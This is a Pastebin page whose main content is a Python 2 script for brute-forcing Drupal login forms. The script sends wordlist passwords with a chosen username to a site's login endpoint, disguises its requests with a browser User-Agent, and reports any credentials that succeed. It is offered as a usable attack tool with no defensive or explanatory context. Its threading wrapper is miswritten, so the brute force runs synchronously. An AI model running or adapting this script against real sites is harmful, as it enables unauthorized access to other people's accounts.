Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- from __future__ import division
- from time import sleep
- import sys
- import httplib, urllib
- import threading
- #Need to limit the threads as no limit is set(MAY Crash The Machine).
- threads=[]
- #Add Detection to make sure login form is enabled before enabling the bruter.
- #
- def BruteForcer(Url, DrupalPasswords, Path, Name, Wordlist, Good, Bad, Debug, EnableDebugging, SSL):
- c=1
- line_count = len(Wordlist)
- #Strip Line Breaks From Passwords And POST Each Password With A Pre Defined Username
- for Password in Wordlist:
- try:
- Password = Password.strip("\r\n")
- Name = Name.strip("\r\n")
- Parameters = urllib.urlencode({"name":Name, "pass":Password, "form_id":"user_login_block", "op":"Log%20in"})
- Headers = {"Content-Type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
- #Check To See If The User Is Wanting To Use SSL
- if SSL:
- Connection = httplib.HTTPSConnection(Url)
- Connection.request("POST","%snode?destination=node" %Path, Parameters, Headers)
- Response = Connection.getresponse()
- #Fall Back To HTTP If SSL Is Not Availible
- else:
- Connection = httplib.HTTPConnection(Url, timeout=float(10))
- Connection.request("POST","%snode?destination=node" %Path, Parameters, Headers)
- Response = Connection.getresponse()
- #When The User And Password Are Found Drupal Accept's With A 301 Request
- if httplib.responses[httplib.FOUND] in Response.reason:
- print("\n%s Username: %s with password: %s found!" %(Good, Name, Password))
- break
- if EnableDebugging:
- print("%s Sending POST Request With Username: %s And Password: %s" %(Debug, Name, Password))
- else:
- #If The --verbose/-v Flag Is Not Set Show A Percentage Of Completion
- sys.stdout.write("\r")
- value = int(round((c / line_count) * 100))
- sys.stdout.write(Good+" Brute forcing started " +str(value) + "% complete")
- sys.stdout.flush()
- c = c + 1
- sleep(0.01)
- except Exception, Error:
- print("\n%s Something Went Wrong Exiting" %(Bad))
- except KeyboardInterrupt:
- print("\n%s Keyboard Interrupt Detected Exiting" %(Bad))
- break
- #Start The Bruter
- def Start_Brute(Url, DrupalPasswords, Path, Name, Wordlist, Good, Bad, Debug, EnableDebugging, SSL):
- t = threading.Thread(target=BruteForcer(Url, DrupalPasswords, Path, Name, Wordlist, Good, Bad, Debug, EnableDebugging, SSL))
- threads.append(t)
- t.start()
- print("\n")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement